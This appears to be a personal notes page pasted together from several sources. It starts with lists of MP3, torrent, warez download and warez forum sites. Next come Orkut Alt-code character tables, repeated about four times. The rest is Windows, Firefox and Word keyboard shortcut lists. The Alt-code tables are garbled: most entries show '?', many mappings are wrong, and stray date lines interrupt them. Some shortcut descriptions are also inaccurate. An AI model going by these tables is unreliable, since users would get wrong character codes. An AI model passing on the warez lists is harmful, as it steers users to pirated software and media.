www.action8cricket.com, www.cricketlivestreaming.com --> sports
www.tvchannelsfree.com -- entertenment
www.pogo.com ---Game, online
Sits of MP3 & Torrents
www.songs.pk
www.attmp3.net
http://www.123musiq.com/
http://www.bollyfm.net/
http://www.masti4india.com/
http://www.mp3hungama.com/
http://www.raaga.com/
http://www.downloadhindimp3s.com/
http://www.musicmaza.com/
http://www.bollywoodhungama.com/
http://www.mp3yug.com/
? Some Website for English Song downloads
http://www.phazemp3.com/
http://www.mp3-center.org/
http://www.mp3-downloads.net/
http://www.emp3world.com/
http://www.new-mp3s.com/
http://mp3.seekasong.com/
http://www.kohit.net/
http://www.mp3fusion.net/
? Top individual Torrent Sites:
http://www.mininova.org
http://thepiratebay.org/
http://isohunt.com/
http://btjunkie.org/
? Top Torrent Search Engines:
http://www.torrentz.com/
http://torrents.to/
? Direct Warez site
http://www.phazeddl.com/
http://www.katz.cd/
http://www.9down.com/
? Top Warez Forums {Requires registration}
http://www.mechodownload.com/
http://www.warez-bb.org/index.php
http://www.forumw.org/
http://www.dl4all.com/
? Top Torrent Forums {optional registration} & Search engines[SE]
http://www.mininova.org
http://thepiratebay.org/
http://isohunt.com/
http://btjunkie.org/
http://www.torrentz.com/ [SE]
http://torrents.to/ [SE]
www.attmp3.net
http://www.123musiq.com/
http://www.bollyfm.net/
http://www.masti4india.com/
http://www.mp3hungama.com/
http://www.raaga.com/
http://www.downloadhindimp3s.com/
http://www.musicmaza.com/
http://www.bollywoodhungama.com/
http://www.mp3yug.com/
? Some Website for English Song downloads
http://www.phazemp3.com/
http://www.mp3-center.org/
http://www.mp3-downloads.net/
http://www.emp3world.com/
http://www.new-mp3s.com/
http://mp3.seekasong.com/
http://www.kohit.net/
http://www.mp3fusion.net/
? Top individual Torrent Sites:
http://www.mininova.org
http://thepiratebay.org/
http://isohunt.com/
http://btjunkie.org/
? Top Torrent Search Engines:
http://www.torrentz.com/
http://torrents.to/
? Direct Warez site
http://www.phazeddl.com/
http://www.katz.cd/
http://www.9down.com/
? Top Warez Forums {Requires registration}
http://www.mechodownload.com/
http://www.warez-bb.org/index.php
http://www.forumw.org/
http://www.dl4all.com/
? Top Torrent Forums {optional registration} & Search engines[SE]
http://www.mininova.org
http://thepiratebay.org/
http://isohunt.com/
http://btjunkie.org/
http://www.torrentz.com/ [SE]
http://torrents.to/ [SE]
Orkut cod's
Alt+1= ?
Alt+2= ?
Alt+3= ?
Alt+4= ?
Alt+5= ?
Alt+6= ?
Alt+7= •
Alt+8= ?
Alt+9= ?
Alt+10= ?
Alt+11= ?
Alt+12= ?
Alt+13= ?
Alt+14= ?
Alt+15= ¤
Alt+16= ?
Alt+17= ?
Alt+18= ?
Alt+19= ?
Alt+20= ¶
Alt+21= §
Alt+22= ?
Alt+23= ?
Alt+24= ?
Alt+25= ?
Alt+26= ?
Alt+27= ?
Alt+28= ?
Alt+29= ?
Alt+30= ?
Alt+31= ?
Alt+127= ¦
Alt+128= Ç
Alt+129= ü
Alt+130= é
Alt+131= â
Alt+132= ä
Alt+133= à
Alt+134= å
Alt+135= ç
Alt+136= ê
Alt+137= ë
Alt+138= è
Alt+139= ï
Alt+140= î
Alt+141= ì
Alt+142= Ä
Alt+143= Å
Alt+144= É
Alt+145= æ
Alt+146= Æ
Alt+147= ô
Alt+148= ö
Alt+149= ò
Alt+150= û
Alt+151= ù
Alt+152= ÿ
Alt+153= Ö
Alt+154= Ü
Alt+155= ¢
Alt+156= £
Alt+157= ¥
Alt+158= P
Alt+159= ƒ
Alt+160= á
Alt+161= í
Alt+162= ó
Alt+163= ú
Alt+164= ñ
Alt+165= Ñ
Alt+166= ª
Alt+167= º
Alt+168= ¿
Alt+169= ¬
Alt+170= ¬
3/26/08
Sangeet
Alt+171= ½
Alt+172= ¼
Alt+173= ¡
Alt+174= «
Alt+175= »
Alt+176=¦
Alt+177= ¦
Alt+178= ¦
Alt+179= ¦
Alt+180=¦
Alt+181= ¦
Alt+182= ¦
Alt+183= +
Alt+184= +
Alt+185= ¦
Alt+186= ¦
Alt+187= +
Alt+188= +
Alt+189= +
Alt+190= +
Alt+191= +
Alt+192= +
Alt+193= -
Alt+194= -
Alt+195= +
Alt+196=-
Alt+197=+
Alt+198=¦
Alt+199=¦
Alt+200=+
Alt+201=+
Alt+202=-
Alt+203=-
Alt+204=-
Alt+205=¦
Alt+206=+
Alt+207=-
Alt+208=-
Alt+209=-
Alt+210=-
Alt+211=+
Alt+212=+
Alt+213=+
Alt+214=+
Alt+215=+
Alt+216=+
Alt+217=+
Alt+218=+
Alt+219=¦
Alt+220=_
Alt+221=¦
Alt+222=¦
Alt+223=¯
Alt+224= a
Alt+225= ß
Alt+226= G
Alt+227=p
Alt+228= S
Alt+229= s
Alt+230= µ
Alt+231= t
Alt+232= F
Alt+233= T
Alt+234= O
Alt+235= d
Alt+236= 8
Alt+237= f
Alt+238= e
Alt+239= n
Alt+240= =
Alt+241= ±
Alt+242= =
Alt+243= =
Alt+244= (
Alt+245= )
Alt+246= ÷
Alt+247= ˜
Alt+248=°
Alt+249= ·
Alt+250= •
Alt+251=v
Alt+252= n
Alt+253= ²
Alt+254= ¦
Alt+2= ?
Alt+3= ?
Alt+4= ?
Alt+5= ?
Alt+6= ?
Alt+7= •
Alt+8= ?
Alt+9= ?
Alt+10= ?
Alt+11= ?
Alt+12= ?
Alt+13= ?
Alt+14= ?
Alt+15= ¤
Alt+16= ?
Alt+17= ?
Alt+18= ?
Alt+19= ?
Alt+20= ¶
Alt+21= §
Alt+22= ?
Alt+23= ?
Alt+24= ?
Alt+25= ?
Alt+26= ?
Alt+27= ?
Alt+28= ?
Alt+29= ?
Alt+30= ?
Alt+31= ?
Alt+127= ¦
Alt+128= Ç
Alt+129= ü
Alt+130= é
Alt+131= â
Alt+132= ä
Alt+133= à
Alt+134= å
Alt+135= ç
Alt+136= ê
Alt+137= ë
Alt+138= è
Alt+139= ï
Alt+140= î
Alt+141= ì
Alt+142= Ä
Alt+143= Å
Alt+144= É
Alt+145= æ
Alt+146= Æ
Alt+147= ô
Alt+148= ö
Alt+149= ò
Alt+150= û
Alt+151= ù
Alt+152= ÿ
Alt+153= Ö
Alt+154= Ü
Alt+155= ¢
Alt+156= £
Alt+157= ¥
Alt+158= P
Alt+159= ƒ
Alt+160= á
Alt+161= í
Alt+162= ó
Alt+163= ú
Alt+164= ñ
Alt+165= Ñ
Alt+166= ª
Alt+167= º
Alt+168= ¿
Alt+169= ¬
Alt+170= ¬
3/26/08
Sangeet
Alt+171= ½
Alt+172= ¼
Alt+173= ¡
Alt+174= «
Alt+175= »
Alt+176=¦
Alt+177= ¦
Alt+178= ¦
Alt+179= ¦
Alt+180=¦
Alt+181= ¦
Alt+182= ¦
Alt+183= +
Alt+184= +
Alt+185= ¦
Alt+186= ¦
Alt+187= +
Alt+188= +
Alt+189= +
Alt+190= +
Alt+191= +
Alt+192= +
Alt+193= -
Alt+194= -
Alt+195= +
Alt+196=-
Alt+197=+
Alt+198=¦
Alt+199=¦
Alt+200=+
Alt+201=+
Alt+202=-
Alt+203=-
Alt+204=-
Alt+205=¦
Alt+206=+
Alt+207=-
Alt+208=-
Alt+209=-
Alt+210=-
Alt+211=+
Alt+212=+
Alt+213=+
Alt+214=+
Alt+215=+
Alt+216=+
Alt+217=+
Alt+218=+
Alt+219=¦
Alt+220=_
Alt+221=¦
Alt+222=¦
Alt+223=¯
Alt+224= a
Alt+225= ß
Alt+226= G
Alt+227=p
Alt+228= S
Alt+229= s
Alt+230= µ
Alt+231= t
Alt+232= F
Alt+233= T
Alt+234= O
Alt+235= d
Alt+236= 8
Alt+237= f
Alt+238= e
Alt+239= n
Alt+240= =
Alt+241= ±
Alt+242= =
Alt+243= =
Alt+244= (
Alt+245= )
Alt+246= ÷
Alt+247= ˜
Alt+248=°
Alt+249= ·
Alt+250= •
Alt+251=v
Alt+252= n
Alt+253= ²
Alt+254= ¦
Orkut cod's
Alt+1= ?
Alt+2= ?
Alt+3= ?
Alt+4= ?
Alt+5= ?
Alt+6= ?
Alt+7= •
Alt+8= ?
Alt+9= ?
Alt+10= ?
Alt+11= ?
Alt+12= ?
Alt+13= ?
Alt+14= ?
Alt+15= ¤
Alt+16= ?
Alt+17= ?
Alt+18= ?
Alt+19= ?
Alt+20= ¶
Alt+21= §
Alt+22= ?
Alt+23= ?
Alt+24= ?
Alt+25= ?
Alt+26= ?
Alt+27= ?
Alt+28= ?
Alt+29= ?
Alt+30= ?
Alt+31= ?
Alt+127= ¦
Alt+128= Ç
Alt+129= ü
Alt+130= é
Alt+131= â
Alt+132= ä
Alt+133= à
Alt+134= å
Alt+135= ç
Alt+136= ê
Alt+137= ë
Alt+138= è
Alt+139= ï
Alt+140= î
Alt+141= ì
Alt+142= Ä
Alt+143= Å
Alt+144= É
Alt+145= æ
Alt+146= Æ
Alt+147= ô
Alt+148= ö
Alt+149= ò
Alt+150= û
Alt+151= ù
Alt+152= ÿ
Alt+153= Ö
Alt+154= Ü
Alt+155= ¢
Alt+156= £
Alt+157= ¥
Alt+158= P
Alt+159= ƒ
Alt+160= á
Alt+161= í
Alt+162= ó
Alt+163= ú
Alt+164= ñ
Alt+165= Ñ
Alt+166= ª
Alt+167= º
Alt+168= ¿
Alt+169= ¬
Alt+170= ¬
3/26/08
Sangeet
Alt+171= ½
Alt+172= ¼
Alt+173= ¡
Alt+174= «
Alt+175= »
Alt+176=¦
Alt+177= ¦
Alt+178= ¦
Alt+179= ¦
Alt+180=¦
Alt+181= ¦
Alt+182= ¦
Alt+183= +
Alt+184= +
Alt+185= ¦
Alt+186= ¦
Alt+187= +
Alt+188= +
Alt+189= +
Alt+190= +
Alt+191= +
Alt+192= +
Alt+193= -
Alt+194= -
Alt+195= +
Alt+196=-
Alt+197=+
Alt+198=¦
Alt+199=¦
Alt+200=+
Alt+201=+
Alt+202=-
Alt+203=-
Alt+204=-
Alt+205=¦
Alt+206=+
Alt+207=-
Alt+208=-
Alt+209=-
Alt+210=-
Alt+211=+
Alt+212=+
Alt+213=+
Alt+214=+
Alt+215=+
Alt+216=+
Alt+217=+
Alt+218=+
Alt+219=¦
Alt+220=_
Alt+221=¦
Alt+222=¦
Alt+223=¯
Alt+224= a
Alt+225= ß
Alt+226= G
Alt+227=p
Alt+228= S
Alt+229= s
Alt+230= µ
Alt+231= t
Alt+232= F
Alt+233= T
Alt+234= O
Alt+235= d
Alt+236= 8
Alt+237= f
Alt+238= e
Alt+239= n
Alt+240= =
Alt+241= ±
Alt+242= =
Alt+243= =
Alt+244= (
Alt+245= )
Alt+246= ÷
Alt+247= ˜
Alt+248=°
Alt+249= ·
Alt+250= •
Alt+251=v
Alt+252= n
Alt+253= ²
Alt+254= ¦
Alt+2= ?
Alt+3= ?
Alt+4= ?
Alt+5= ?
Alt+6= ?
Alt+7= •
Alt+8= ?
Alt+9= ?
Alt+10= ?
Alt+11= ?
Alt+12= ?
Alt+13= ?
Alt+14= ?
Alt+15= ¤
Alt+16= ?
Alt+17= ?
Alt+18= ?
Alt+19= ?
Alt+20= ¶
Alt+21= §
Alt+22= ?
Alt+23= ?
Alt+24= ?
Alt+25= ?
Alt+26= ?
Alt+27= ?
Alt+28= ?
Alt+29= ?
Alt+30= ?
Alt+31= ?
Alt+127= ¦
Alt+128= Ç
Alt+129= ü
Alt+130= é
Alt+131= â
Alt+132= ä
Alt+133= à
Alt+134= å
Alt+135= ç
Alt+136= ê
Alt+137= ë
Alt+138= è
Alt+139= ï
Alt+140= î
Alt+141= ì
Alt+142= Ä
Alt+143= Å
Alt+144= É
Alt+145= æ
Alt+146= Æ
Alt+147= ô
Alt+148= ö
Alt+149= ò
Alt+150= û
Alt+151= ù
Alt+152= ÿ
Alt+153= Ö
Alt+154= Ü
Alt+155= ¢
Alt+156= £
Alt+157= ¥
Alt+158= P
Alt+159= ƒ
Alt+160= á
Alt+161= í
Alt+162= ó
Alt+163= ú
Alt+164= ñ
Alt+165= Ñ
Alt+166= ª
Alt+167= º
Alt+168= ¿
Alt+169= ¬
Alt+170= ¬
3/26/08
Sangeet
Alt+171= ½
Alt+172= ¼
Alt+173= ¡
Alt+174= «
Alt+175= »
Alt+176=¦
Alt+177= ¦
Alt+178= ¦
Alt+179= ¦
Alt+180=¦
Alt+181= ¦
Alt+182= ¦
Alt+183= +
Alt+184= +
Alt+185= ¦
Alt+186= ¦
Alt+187= +
Alt+188= +
Alt+189= +
Alt+190= +
Alt+191= +
Alt+192= +
Alt+193= -
Alt+194= -
Alt+195= +
Alt+196=-
Alt+197=+
Alt+198=¦
Alt+199=¦
Alt+200=+
Alt+201=+
Alt+202=-
Alt+203=-
Alt+204=-
Alt+205=¦
Alt+206=+
Alt+207=-
Alt+208=-
Alt+209=-
Alt+210=-
Alt+211=+
Alt+212=+
Alt+213=+
Alt+214=+
Alt+215=+
Alt+216=+
Alt+217=+
Alt+218=+
Alt+219=¦
Alt+220=_
Alt+221=¦
Alt+222=¦
Alt+223=¯
Alt+224= a
Alt+225= ß
Alt+226= G
Alt+227=p
Alt+228= S
Alt+229= s
Alt+230= µ
Alt+231= t
Alt+232= F
Alt+233= T
Alt+234= O
Alt+235= d
Alt+236= 8
Alt+237= f
Alt+238= e
Alt+239= n
Alt+240= =
Alt+241= ±
Alt+242= =
Alt+243= =
Alt+244= (
Alt+245= )
Alt+246= ÷
Alt+247= ˜
Alt+248=°
Alt+249= ·
Alt+250= •
Alt+251=v
Alt+252= n
Alt+253= ²
Alt+254= ¦
Orkut cod's
Alt+1= ?
Alt+2= ?
Alt+3= ?
Alt+4= ?
Alt+5= ?
Alt+6= ?
Alt+7= •
Alt+8= ?
Alt+9= ?
Alt+10= ?
Alt+11= ?
Alt+12= ?
Alt+13= ?
Alt+14= ?
Alt+15= ¤
Alt+16= ?
Alt+17= ?
Alt+18= ?
Alt+19= ?
Alt+20= ¶
Alt+21= §
Alt+22= ?
Alt+23= ?
Alt+24= ?
Alt+25= ?
Alt+26= ?
Alt+27= ?
Alt+28= ?
Alt+29= ?
Alt+30= ?
Alt+31= ?
Alt+127= ¦
Alt+128= Ç
Alt+129= ü
Alt+130= é
Alt+131= â
Alt+132= ä
Alt+133= à
Alt+134= å
Alt+135= ç
Alt+136= ê
Alt+137= ë
Alt+138= è
Alt+139= ï
Alt+140= î
Alt+141= ì
Alt+142= Ä
Alt+143= Å
Alt+144= É
Alt+145= æ
Alt+146= Æ
Alt+147= ô
Alt+148= ö
Alt+149= ò
Alt+150= û
Alt+151= ù
Alt+152= ÿ
Alt+153= Ö
Alt+154= Ü
Alt+155= ¢
Alt+156= £
Alt+157= ¥
Alt+158= P
Alt+159= ƒ
Alt+160= á
Alt+161= í
Alt+162= ó
Alt+163= ú
Alt+164= ñ
Alt+165= Ñ
Alt+166= ª
Alt+167= º
Alt+168= ¿
Alt+169= ¬
Alt+170= ¬
3/26/08
Sangeet
Alt+171= ½
Alt+172= ¼
Alt+173= ¡
Alt+174= «
Alt+175= »
Alt+176=¦
Alt+177= ¦
Alt+178= ¦
Alt+179= ¦
Alt+180=¦
Alt+181= ¦
Alt+182= ¦
Alt+183= +
Alt+184= +
Alt+185= ¦
Alt+186= ¦
Alt+187= +
Alt+188= +
Alt+189= +
Alt+190= +
Alt+191= +
Alt+192= +
Alt+193= -
Alt+194= -
Alt+195= +
Alt+196=-
Alt+197=+
Alt+198=¦
Alt+199=¦
Alt+200=+
Alt+201=+
Alt+202=-
Alt+203=-
Alt+204=-
Alt+205=¦
Alt+206=+
Alt+207=-
Alt+208=-
Alt+209=-
Alt+210=-
Alt+211=+
Alt+212=+
Alt+213=+
Alt+214=+
Alt+215=+
Alt+216=+
Alt+217=+
Alt+218=+
Alt+219=¦
Alt+220=_
Alt+221=¦
Alt+222=¦
Alt+223=¯
Alt+224= a
Alt+225= ß
Alt+226= G
Alt+227=p
Alt+228= S
Alt+229= s
Alt+230= µ
Alt+231= t
Alt+232= F
Alt+233= T
Alt+234= O
Alt+235= d
Alt+236= 8
Alt+237= f
Alt+238= e
Alt+239= n
Alt+240= =
Alt+241= ±
Alt+242= =
Alt+243= =
Alt+244= (
Alt+245= )
Alt+246= ÷
Alt+247= ˜
Alt+248=°
Alt+249= ·
Alt+250= •
Alt+251=v
Alt+252= n
Alt+253= ²
Alt+254= ¦
Alt+2= ?
Alt+3= ?
Alt+4= ?
Alt+5= ?
Alt+6= ?
Alt+7= •
Alt+8= ?
Alt+9= ?
Alt+10= ?
Alt+11= ?
Alt+12= ?
Alt+13= ?
Alt+14= ?
Alt+15= ¤
Alt+16= ?
Alt+17= ?
Alt+18= ?
Alt+19= ?
Alt+20= ¶
Alt+21= §
Alt+22= ?
Alt+23= ?
Alt+24= ?
Alt+25= ?
Alt+26= ?
Alt+27= ?
Alt+28= ?
Alt+29= ?
Alt+30= ?
Alt+31= ?
Alt+127= ¦
Alt+128= Ç
Alt+129= ü
Alt+130= é
Alt+131= â
Alt+132= ä
Alt+133= à
Alt+134= å
Alt+135= ç
Alt+136= ê
Alt+137= ë
Alt+138= è
Alt+139= ï
Alt+140= î
Alt+141= ì
Alt+142= Ä
Alt+143= Å
Alt+144= É
Alt+145= æ
Alt+146= Æ
Alt+147= ô
Alt+148= ö
Alt+149= ò
Alt+150= û
Alt+151= ù
Alt+152= ÿ
Alt+153= Ö
Alt+154= Ü
Alt+155= ¢
Alt+156= £
Alt+157= ¥
Alt+158= P
Alt+159= ƒ
Alt+160= á
Alt+161= í
Alt+162= ó
Alt+163= ú
Alt+164= ñ
Alt+165= Ñ
Alt+166= ª
Alt+167= º
Alt+168= ¿
Alt+169= ¬
Alt+170= ¬
3/26/08
Sangeet
Alt+171= ½
Alt+172= ¼
Alt+173= ¡
Alt+174= «
Alt+175= »
Alt+176=¦
Alt+177= ¦
Alt+178= ¦
Alt+179= ¦
Alt+180=¦
Alt+181= ¦
Alt+182= ¦
Alt+183= +
Alt+184= +
Alt+185= ¦
Alt+186= ¦
Alt+187= +
Alt+188= +
Alt+189= +
Alt+190= +
Alt+191= +
Alt+192= +
Alt+193= -
Alt+194= -
Alt+195= +
Alt+196=-
Alt+197=+
Alt+198=¦
Alt+199=¦
Alt+200=+
Alt+201=+
Alt+202=-
Alt+203=-
Alt+204=-
Alt+205=¦
Alt+206=+
Alt+207=-
Alt+208=-
Alt+209=-
Alt+210=-
Alt+211=+
Alt+212=+
Alt+213=+
Alt+214=+
Alt+215=+
Alt+216=+
Alt+217=+
Alt+218=+
Alt+219=¦
Alt+220=_
Alt+221=¦
Alt+222=¦
Alt+223=¯
Alt+224= a
Alt+225= ß
Alt+226= G
Alt+227=p
Alt+228= S
Alt+229= s
Alt+230= µ
Alt+231= t
Alt+232= F
Alt+233= T
Alt+234= O
Alt+235= d
Alt+236= 8
Alt+237= f
Alt+238= e
Alt+239= n
Alt+240= =
Alt+241= ±
Alt+242= =
Alt+243= =
Alt+244= (
Alt+245= )
Alt+246= ÷
Alt+247= ˜
Alt+248=°
Alt+249= ·
Alt+250= •
Alt+251=v
Alt+252= n
Alt+253= ²
Alt+254= ¦
keyboard shortcut collection
CTRL+C (Copy)
CTRL+X (Cut)
CTRL+V (Paste)
CTRL+Z (Undo)
DELETE (Delete)
SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
CTRL while dragging an item (Copy the selected item)
CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
F2 key (Rename the selected item)
CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
CTRL+A (Select all)
F3 key (Search for a file or a folder)
ALT+ENTER (View the properties for the selected item)
ALT+F4 (Close the active item, or quit the active program)
ALT+ENTER (Display the properties of the selected object)
ALT+SPACEBAR (Open the shortcut menu for the active window)
CTRL+F4 (Close the active document in programs that enable you to have multiple documents open simultaneously)
ALT+TAB (Switch between the open items)
ALT+ESC (Cycle through items in the order that they had been opened)
F6 key (Cycle through the screen elements in a window or on the desktop)
F4 key (Display the Address bar list in My Computer or Windows Explorer)
SHIFT+F10 (Display the shortcut menu for the selected item)
ALT+SPACEBAR (Display the System menu for the active window)
CTRL+ESC (Display the Start menu)
ALT+Underlined letter in a menu name (Display the corresponding menu)
Underlined letter in a command name on an open menu (Perform the corresponding command)
F10 key (Activate the menu bar in the active program)
RIGHT ARROW (Open the next menu to the right, or open a submenu)
LEFT ARROW (Open the next menu to the left, or close a submenu)
F5 key (Update the active window)
BACKSPACE (View the folder one level up in My Computer or Windows Explorer)
ESC (Cancel the current task)
SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)
Dialog Box Keyboard Shortcuts
CTRL+TAB (Move forward through the tabs)
CTRL+SHIFT+TAB (Move backward through the tabs)
TAB (Move forward through the options)
SHIFT+TAB (Move backward through the options)
ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
ENTER (Perform the command for the active option or button)
SPACEBAR (Select or clear the check box if the active option is a check box)
Arrow keys (Select a button if the active option is a group of option buttons)
F1 key (Display Help)
F4 key (Display the items in the active list)
BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)
Microsoft Natural Keyboard Shortcuts
Windows Logo (Display or hide the Start menu)
Windows Logo+BREAK (Display the System Properties dialog box)
Windows Logo+D (Display the desktop)
Windows Logo+M (Minimize all of the windows)
Windows Logo+SHIFT+M (Restore the minimized windows)
Windows Logo+E (Open My Computer)
Windows Logo+F (Search for a file or a folder)
CTRL+Windows Logo+F (Search for computers)
Windows Logo+F1 (Display Windows Help)
Windows Logo+ L (Lock the keyboard)
Windows Logo+R (Open the Run dialog box)
Windows Logo+U (Open Utility Manager)
Accessibility Keyboard Shortcuts
Right SHIFT for eight seconds (Switch FilterKeys either on or off)
Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
Windows Logo +U (Open Utility Manager)
Windows Explorer Keyboard Shortcuts
END (Display the bottom of the active window)
HOME (Display the top of the active window)
NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
NUM LOCK+Minus sign (-) (Collapse the selected folder)
LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
Shortcut Keys for Character Map
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
RIGHT ARROW (Move to the right or to the beginning of the next line)
LEFT ARROW (Move to the left or to the end of the previous line)
UP ARROW (Move up one row)
DOWN ARROW (Move down one row)
PAGE UP (Move up one screen at a time)
PAGE DOWN (Move down one screen at a time)
HOME (Move to the beginning of the line)
END (Move to the end of the line)
CTRL+HOME (Move to the first character)
CTRL+END (Move to the last character)
SPACEBAR (Switch between Enlarged and Nor mal mode when a character is selected)
Microsoft Management Console (MMC) Main Window Keyboard Shortcuts
CTRL+O (Open a saved console)
CTRL+N (Open a new console)
CTRL+S (Save the open console)
CTRL+M (Add or remove a console item)
CTRL+W (Open a new window)
F5 key (Update the content of all console windows)
ALT+SPACEBAR (Display the MMC window menu)
ALT+F4 (Close the console)
ALT+A (Display the Action menu)
ALT+V (Display the View menu)
ALT+F (Display the File menu)
ALT+O (Display the Favorites menu)
MMC Console Window Keyboard Shortcuts
CTRL+P (Print the current page or active pane)
ALT+Minus sign (-) (Display the window menu for the active console window)
SHIFT+F10 (Display the Action shortcut menu for the selected item)
F1 key (Open the Help topic, if any, for the selected item)
F5 key (Update the content of all console windows)
CTRL+F10 (Maximize the active console window)
CTRL+F5 (Restore the active console window)
ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
F2 key (Rename the selected item)
CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
Remote Desktop Connection Navigation
CTRL+ALT+END (Open the m*cro$oft Windows NT Security dialog box)
ALT+PAGE UP (Switch between programs from left to right)
ALT+PAGE DOWN (Switch between programs from right to left)
ALT+INSERT (Cycle through the programs in most recently used order)
ALT+HOME (Display the Start menu)
CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
ALT+DELETE (Display the Windows menu)
CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
Internet Explorer navigation
CTRL+B (Open the Organize Favorites dialog box)
CTRL+E (Open the Search bar)
CTRL+F (Start the Find utility)
CTRL+H (Open the History bar)
CTRL+I (Open the Favorites bar)
CTRL+L (Open the Open dialog box)
CTRL+N (Start another instance of the browser with the same Web address)
CTRL+O (Open the Open dialog box, the same as CTRL+L)
CTRL+P (Open the Print dialog box)
CTRL+R (Update the current Web page)
CTRL+W (Close the current window)
In IE… you can press ALT+D > Address Bar… with Alt you have all the stuff..
ALT+SPACEBAR (Open the shortcut menu for the active window)
ALT+SPACEBAR (Display the System menu for the active window)
ALT+SPACEBAR is a good one.
Try these alt-spacebar combos:
-alt + spacebar + n = Shrink (minimize) current window
-alt + spacebar + x = Maximize current window
-this one has saved my ass before quite a few times
-alt + spacebar + m = Move current windows with arrow keys
Also, don’t forget for internet browsing, in IE, typing in hongkiat, and then pressing CTRL-Enter fills in the www, and the .com, and if you use Firefox, Ctrl=Shift-Enter adds .org, and shift-enter fills in .net, saves me a lot of time every day right there.
Crtl + Insert = Copy
Shift + Insert = Paste
-alt + spacebar + m = Move current windows with arrow keys
CTRL+D
Minimizes all windows and displays desktop. If you repeat it, all windows maximize again the way they were.
alt + spacebar + m = Move current windows with arrow keys
CTRL+Shift+ESC opens the Taskmanager :)
windows + L actually logs you off,it doesn’t lock the keyboard.
CTRL+SPACEBAR+C or CTRL+W to close active window/programs.
Ctrl-Shift (and the plus sign on the Num pad)
Windows Keyboard Shortcuts for Mozilla Firefox
CTRL + A Select all text on a webpage
CTRL + B Open the Bookmarks sidebar
CTRL + C Copy the selected text to the Windows clipboard
CTRL + D Bookmark the current webpage
CTRL + F Find text within the current webpage
CTRL + G Find more text within the same webpage
CTRL + H Opens the webpage History sidebar
CTRL + I Open the Bookmarks sidebar
CTRL + J Opens the Download Dialogue Box
CTRL + K Places the cursor in the Web Search box ready to type your search
CTRL + L Places the cursor into the URL box ready to type a website address
CTRL + M Opens your mail program (if you have one) to create a new email message
CTRL + N Opens a new Firefox window
CTRL + O Open a local file
CTRL + P Print the current webpage
CTRL + R Reloads the current webpage
CTRL + S Save the current webpage on your PC
CTRL + T Opens a new Firefox Tab
CTRL + U View the page source of the current webpage
CTRL + V Paste the contents of the Windows clipboard
CTRL + W Closes the current Firefox Tab or Window (if more than one tab is open)
CTRL + X Cut the selected text
CTRL + Z Undo the last action
Windows Keyboard Shortcuts for Mozilla Firefox (Function keys)
F1 Opens Firefox help
F3 Find more text within the same webpage
F5 Reload the current webpage
F6 Toggles the cursor between the address/URL input box and the current webpage
F7 Toggles Caret Browsing on and off. Used to be able to select text on a webpage with the keyboard
F11 Switch to Full Screen mode
221 Microsoft Word Shortcuts - 1
1
Ctrl + Shift + A
AllCaps
Makes the selection all capitals (toggle)
2
Alt + Ctrl + 1
ApplyHeading1
Applies Heading 1 style to the selected text
3
Alt + Ctrl + 2
ApplyHeading2
Applies Heading 2 style to the selected text
4
Alt + Ctrl + 3
ApplyHeading3
Applies Heading 3 style to the selected text
5
Ctrl + Shift + L
ApplyListBullet
Applies List Bullet style to the selected text
6
Alt + F10
AppMaximize
Enlarges the application window to full size
7
Alt + F5
AppRestore
Restores the application window to normal size
8
Ctrl+B
Bold
Makes the selection bold (toggle)
9
Ctrl + PgDn
BrowseNext
Jump to the next browse object
10
Ctrl + PgUp
BrowsePrev
Jump to the previous browse object
11
Alt + Ctrl + Home
BrowseSel
Select the next/prev browse object
12
Esc
Cancel
Terminates an action
13
Ctrl+E
CenterPara
Centers the paragraph between the indents
14
Shift+F3
ChangeCase
Changes the case of the letters in the selection
15
Left arrow
CharLeft
Moves the insertion point to the left one character
16
Shift + Left arrow
CharLeftExtend
Extends the selection to the left one character
17
Rt arrow
CharRight
Moves the insertion point to the right one character
18
Shift + Rt arrow
CharRightExtend
Extends the selection to the right one character
19
Alt + Shift + C
ClosePane
Closes the active window pane (if you are in Normal View and have, for example, the Footnote pane open)
20
Alt+Drag (or press Ctrl + Shift + F8 and drag, but Alt + Drag is far easier!)
ColumnSelect
Selects a columnar block of text
21
Ctrl +Shift+C
CopyFormat
Copies the formatting of the selection
22
Shift + F2
CopyText
Makes a copy of the selection without using the clipboard (press Return to paste)
23
Alt + F3
CreateAutoText
Adds an AutoText entry to the active template
24
Ctrl+ Backspace
DeleteBackWord
Deletes the previous word without putting it on the Clipboard
25
Ctrl + Del
DeleteWord
Deletes the next word without putting it on the Clipboard
26
Ctrl+W, Ctrl+F4
DocClose
Prompts to save the document and then closes the active window. (But doesn't intercept the menu command)
27
Ctrl + F10
DocMaximize
Enlarges the active window to full size
28
Ctrl + F7
DocMove
Changes the position of the active window
29
Ctrl + F5
DocRestore
Restores the window to normal size
30
Ctrl + F8
DocSize
Changes the size of the active window
31
Alt + Ctrl + S
DocSplit
Splits the active window horizontally and then adjusts the split
32
Alt + Shift + F9
DoFieldClick
Executes the action associated with macrobutton fields
33
Ctrl + Shift + D
DoubleUnderline
